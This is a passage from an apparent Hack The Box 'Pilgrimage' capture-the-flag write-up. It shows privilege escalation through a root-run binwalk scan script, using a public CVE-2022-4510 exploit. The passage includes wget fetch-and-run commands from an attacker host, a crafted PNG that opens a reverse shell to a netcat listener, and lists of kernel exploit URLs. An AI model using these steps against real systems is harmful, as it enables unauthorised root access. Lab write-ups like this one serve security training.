After a quick perusal of the output file, I couldn't find anything particularly interesting, so I start filtering by keywords in order to narrow down the set of information in which to look for some clues.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/dwnl]
└─$ grep CVE lpeasout.txt
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
[+] [CVE-2022-0847] DirtyPipe
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
[+] [CVE-2022-2586] nft_object UAF
[+] [CVE-2021-3156] sudo Baron Samedit
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c

The usual CVEs are just false positives in most cases.

I try to read something from the forum, a hint saying, "[...] just keep your eyes open and see what is running when an user uploads something [...]" or another saying "watch for user-triggered activity [...]". Let's try to prepare a web server to upload the pspy64 binary and launch it on the target machine, then upload a file on the BOX!

emily@pilgrimage:~/tmp$ wget http://10.10.14.63/pspy64 && chmod +x pspy64 && ./pspy64
--2023-07-29 18:46:35--  http://10.10.14.63/pspy64
Connecting to 10.10.14.63:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M)
Saving to: ‘pspy64’

pspy64                            100%[==========================================================>]   2.96M  1.64MB/s    in 1.8s    

2023-07-29 18:46:37 (1.64 MB/s) - ‘pspy64’ saved [3104768/3104768]

pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/07/29 18:46:39 CMD: UID=1000  PID=1113   | ./pspy64 
2023/07/29 18:46:39 CMD: UID=0     PID=1106   | 
2023/07/29 18:46:39 CMD: UID=1000  PID=1050   | -bash 
2023/07/29 18:46:39 CMD: UID=1000  PID=1049   | sshd: emily@pts/0    
2023/07/29 18:46:39 CMD: UID=0     PID=1042   | 
2023/07/29 18:46:39 CMD: UID=1000  PID=1031   | (sd-pam) 
2023/07/29 18:46:39 CMD: UID=1000  PID=1030   | /lib/systemd/systemd --user 
2023/07/29 18:46:39 CMD: UID=0     PID=1027   | sshd: emily [priv]   
2023/07/29 18:46:39 CMD: UID=0     PID=1024   | 
2023/07/29 18:46:39 CMD: UID=0     PID=974    | 
2023/07/29 18:46:39 CMD: UID=33    PID=834    | php-fpm: pool www                                                             
2023/07/29 18:46:39 CMD: UID=33    PID=833    | php-fpm: pool www                                                             
2023/07/29 18:46:39 CMD: UID=0     PID=829    | 
2023/07/29 18:46:39 CMD: UID=33    PID=811    | nginx: worker process                            
2023/07/29 18:46:39 CMD: UID=33    PID=810    | nginx: worker process                            
2023/07/29 18:46:39 CMD: UID=0     PID=808    | nginx: master process /usr/sbin/nginx -g daemon on; master_process on; 
2023/07/29 18:46:39 CMD: UID=0     PID=777    | /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0                                                                                 
2023/07/29 18:46:39 CMD: UID=0     PID=720    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/07/29 18:46:39 CMD: UID=0     PID=705    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/07/29 18:46:39 CMD: UID=0     PID=689    | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:46:39 CMD: UID=0     PID=688    | /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ 
2023/07/29 18:46:39 CMD: UID=0     PID=675    | /lib/systemd/systemd-logind 
2023/07/29 18:46:39 CMD: UID=0     PID=668    | /usr/sbin/rsyslogd -n -iNONE 
2023/07/29 18:46:39 CMD: UID=0     PID=663    | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)                       
2023/07/29 18:46:39 CMD: UID=0     PID=658    | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:46:39 CMD: UID=0     PID=650    | 
2023/07/29 18:46:39 CMD: UID=103   PID=649    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                                  
2023/07/29 18:46:39 CMD: UID=0     PID=648    | /usr/sbin/cron -f 
2023/07/29 18:46:39 CMD: UID=0     PID=632    | 
2023/07/29 18:46:39 CMD: UID=0     PID=631    | 
2023
[...]

Let's upload a file using the web page on the BOX and analyze the process launched during this operation.

[...]
2023/07/29 18:46:39 CMD: UID=0     PID=1      | /sbin/init 
2023/07/29 18:48:24 CMD: UID=33    PID=1122   | sh -c /var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                           
2023/07/29 18:48:24 CMD: UID=33    PID=1123   | 
2023/07/29 18:48:24 CMD: UID=33    PID=1124   | /var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                                 
2023/07/29 18:48:24 CMD: UID=33    PID=1125   | /var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                                 
2023/07/29 18:48:24 CMD: UID=33    PID=1127   | /var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                                 
2023/07/29 18:48:24 CMD: UID=0     PID=1126   | /lib/systemd/systemd-udevd 
2023/07/29 18:48:24 CMD: UID=33    PID=1130   | 
2023/07/29 18:48:24 CMD: UID=33    PID=1129   | /bin/bash /tmp/.mount_magickfJRU55/AppRun convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                      
2023/07/29 18:48:24 CMD: UID=33    PID=1131   | /bin/bash /tmp/.mount_magickfJRU55/AppRun convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                      
2023/07/29 18:48:24 CMD: UID=33    PID=1132   | /bin/bash /tmp/.mount_magickfJRU55/AppRun convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                      
2023/07/29 18:48:24 CMD: UID=33    PID=1133   | /bin/bash /tmp/.mount_magickfJRU55/AppRun convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                      
2023/07/29 18:48:24 CMD: UID=33    PID=1134   | 
2023/07/29 18:48:24 CMD: UID=33    PID=1135   | /bin/bash /tmp/.mount_magickfJRU55/AppRun convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                      
2023/07/29 18:48:24 CMD: UID=33    PID=1136   | 
2023/07/29 18:48:24 CMD: UID=0     PID=1141   | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:48:24 CMD: UID=0     PID=1140   | /usr/bin/tail -n 1 
2023/07/29 18:48:24 CMD: UID=0     PID=1139   | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:48:24 CMD: UID=0     PID=1138   | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:48:24 CMD: UID=0     PID=1142   | /bin/bash /usr/sbin/malwarescan.sh 
2023/07/29 18:48:24 CMD: UID=33    PID=1143   | /var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/64c4d2587adea2.50715382_iqgknfmpejloh.png -resize 50% /var/www/pilgrimage.htb/shrunk/64c4d2587b65e.png                                                 
2023/07/29 18:48:24 CMD: UID=0     PID=1144   | 

Ok, apart the converter I can see a script called "malwarescan.sh" launched during the upload operation. Let's take a look at the script.

emily@pilgrimage:~/tmp$ cat /usr/sbin/malwarescan.sh
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

The script uses the inotifywait command to monitor the directory /var/www/pilgrimage.htb/shrunk/ for the creation of new files. When a new file is created in the directory, the script uses the binwalk command to analyze the file and obtain its output.

The binwalk command is used to analyze binary files and search for specific contents, signatures, or headers.

The output of binwalk is saved in the variable binout. Next, the script loops over a blacklist of keywords stored in the blacklist variable. This blacklist contains some phrases that may be present in the binwalk output to indicate that the file is an executable or a Microsoft executable. If any of the keywords are present in the binwalk output, the script removes the file using the rm command. In summary, this script is used to monitor the directory /var/www/pilgrimage.htb/shrunk/ for the creation of new files and checks if these files are executables or Microsoft executables using the binwalk command. If a file falls into one of the forbidden categories, it is deleted.

We only have to understand how to exploit this script to elevate our privileges.

Nothing interesting searching for "inotifywait exploit", but when I search for "exploit binwal" many exploit links come up, including RCE (Remote Code Execution). First, let's understand which version of binwalk we are dealing with (just run the command on the remote machine): 2.3.2.

Binwalk v2.3.2 - Remote Command Execution (RCE) - exploit...
┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/scrp]
└─$ python3 script.py ./hacked.png 10.10.14.63 4444

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################


You can now rename and share binwalk_exploit and start your local netcat listener.

                                                                                                                                     
┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/scrp]
└─$ ls -la
total 180
drwxr-xr-x 2 in7rud3r in7rud3r  4096 Jul 29 11:46 .
drwxr-xr-x 7 in7rud3r in7rud3r  4096 Jul 29 11:41 ..
-rw-r--r-- 1 in7rud3r in7rud3r 83111 Jul 29 11:46 binwalk_exploit.png
-rw-r--r-- 1 in7rud3r in7rud3r 82430 Jul 29 11:44 hacked.png
-rw-r--r-- 1 in7rud3r in7rud3r  2729 Jul 29 11:42 script.py
                                                                                                                                     
┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/scrp]
└─$ nc -lvnp 4444               
listening on [any] 4444 ...

I had to try and try again before I succeeded, but apparently, the exploit didn't want to work. After experimenting with different images, thinking that some particular aspect of the specific images I had chosen was not right, and after changing the listener ports, and a number of other attempts, I reanalyzed the script. I started browsing through the portal's processing folders and remembered that the folders inside the shrunk folder are the images already processed by the imagemagick. Thus, the image must already be there when the script runs. Nothing is easier. I just have to copy the image into the folder and wait for the script to do its job.

emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ wget http://10.10.14.63/last.png
--2023-07-29 21:21:52--  http://10.10.14.63/last.png
Connecting to 10.10.14.63:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32771 (32K) [image/png]
Saving to: ‘last.png’

last.png                          100%[==========================================================>]  32.00K  --.-KB/s    in 0.1s    

2023-07-29 21:21:52 (291 KB/s) - ‘last.png’ saved [32771/32771]

And as if by magic...

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/scrp]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.63] from pilgrimage.htb [10.10.11.219] 45506
whoami
root
cat /root/root.txt
d******************************6

Finished. The flags have been captured this time too. That's all folks. I'll wait for you at the next BOX. Happy hacking, everyone!

Below is an alternate blog post image that was curated.

This AI-generated image was created on Midjourney and curated by Tom Caliendo.